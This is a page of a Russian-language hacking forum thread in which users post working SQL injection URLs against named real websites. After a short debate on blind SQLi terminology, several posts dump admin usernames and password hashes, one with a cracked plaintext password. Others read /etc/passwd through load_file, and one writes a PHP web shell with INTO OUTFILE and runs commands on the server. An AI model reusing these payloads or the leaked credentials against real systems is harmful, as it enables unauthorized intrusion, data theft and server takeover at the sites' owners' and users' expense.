HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Уязвимости SQLi, XSS и другие.
   
Ответ
Страница 26 из 35 « Первая < 16 22 23 24 25 26 27 28 29 30 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #251  
Старый 19.02.2017, 23:37
leksadin
Guest
Сообщений: n/a
Провел на форуме:
28741

Репутация: 12
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....
Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд.

Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.
 
Ответить с цитированием

  #252  
Старый 19.02.2017, 23:49
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Цитата:
Сообщение от leksadin  
leksadin said:

Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд.
Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.
Так это не противоречит тому, что я написал. Если ты выводишь алерт через параметр со страницы или через скулю....это немного разные вещи. Я только об этом.
 
Ответить с цитированием

  #253  
Старый 25.02.2017, 01:10
SeytaR
Guest
Сообщений: n/a
Провел на форуме:
1802

Репутация: 7
По умолчанию
www.ghanaconsulate.ae

Db Version :5.1.73-community

Db User : itscircle@localhost

Port :3306

Check if Symlink is ON :YES

Server Os Detected :Win32

http://www.ghanaconsulate.ae/about.php?id=-8 union select 1,group_concat(username,0x3a,password),3,4,5,6 from user--+


admin@ghanaconsulate.ae:db38984fdc3d2fc992bdaaf12e64d976


db38984fdc3d2fc992bdaaf12e64d976:ITS@123
 
Ответить с цитированием

  #254  
Старый 15.03.2017, 21:25
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VGplNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkDNiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeVpmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZkWWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUTJWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2MoZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNVTHlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYHhHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRGSWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSNxmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRkSrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJpVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1UMSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVWxWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cnWEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYtZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5UVWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dVRlTDFGbSVlUtRHa[/COLOR][/COLOR] 
Есть ещё всяких много разных, если будет интерес буду выкладывать редко
 
Ответить с цитированием

  #255  
Старый 16.03.2017, 17:03
pastword
Guest
Сообщений: n/a
Провел на форуме:
3765

Репутация: 0
По умолчанию
Цитата:
Сообщение от BabaDook  
BabaDook said:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VGplNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkDNiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeVpmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZkWWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUTJWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2MoZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNVTHlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYHhHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRGSWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSNxmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRkSrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJpVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1UMSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVWxWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cnWEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYtZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5UVWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dVRlTDFGbSVlUtRHa[/COLOR][/COLOR] 
Есть ещё всяких много разных, если будет интерес буду выкладывать редко
интереснее то, как ты нашел уязвимость)), но все таки выкладывай, очень интересно увидеть разные случай.
 
Ответить с цитированием

  #256  
Старый 29.03.2017, 20:51
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Думал что- же такое. В итоге оказался пустяк.

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//randyfath.com/international.php?id=-53 UnIon SeLEcT 0x3120616e642066616c7365202020756e696f6e2073656c65637420312c322c7573657228292c342c352c36,2,3,4,5,6[/COLOR][/COLOR] 
Просто не обычно
 
Ответить с цитированием

  #257  
Старый 29.03.2017, 21:31
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию
target:http://[COLOR="rgb(191, 191, 191)"]uzswlu.uz[/COLOR]

type:SQL Injection

Код:
Code:
http://uzswlu.uz/site/search?search=1" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+
 
Ответить с цитированием

  #258  
Старый 30.03.2017, 18:05
pastword
Guest
Сообщений: n/a
Провел на форуме:
3765

Репутация: 0
По умолчанию
Sql-inject

Код:
Code:
http://dars.tj/topic.php?SECTION_ID=22'+UnIoN+SeLeCt+1,2,3,4,5,6,7,8,concat_ws(0x3a,LOGIN,PASSWORD),10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+c_user+--+&ID=35&UPPER_ID=
admin:v0_S)B6j1a321ed955a9a82777afe79f9f74bc5d

teacher:eRuzjWNCd8a62f807a2fe77ab7c3e065697c36d7
 
Ответить с цитированием

  #259  
Старый 08.05.2017, 21:05
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию
Несколько SQLi с чтением файла из файловой системы

Код:
Code:
http://immersionprograms.com/index.php/info/gallery?sid=956&catid=-1 union all select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9&mcatid=806
Здесь вывод в title

Код:
Code:
view-source:http://www.eandkwood.com/category.php?c=1' union all select 1,2,3,load_file('/etc/passwd'),5,6,7 and '0'='0
Некий шоп с фармой

Код:
Code:
http://www.rxnature.com/category.html?cid=1' union all select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13 and '0'='0
 
Ответить с цитированием

  #260  
Старый 09.05.2017, 23:02
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию
Запись минишела через SQLi и выполнение команд на сервере.

Код:
Code:
http://www.hamber.net/News_Detail.php?SN=-1 union all select 1,2,3,'',5,6,7 into outfile '/var/www/html/xux.php' --+
http://www.hamber.net/xux.php?cmd=ls -l
 
Ответить с цитированием
Ответ
Страница 26 из 35 « Первая < 16 22 23 24 25 26 27 28 29 30 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ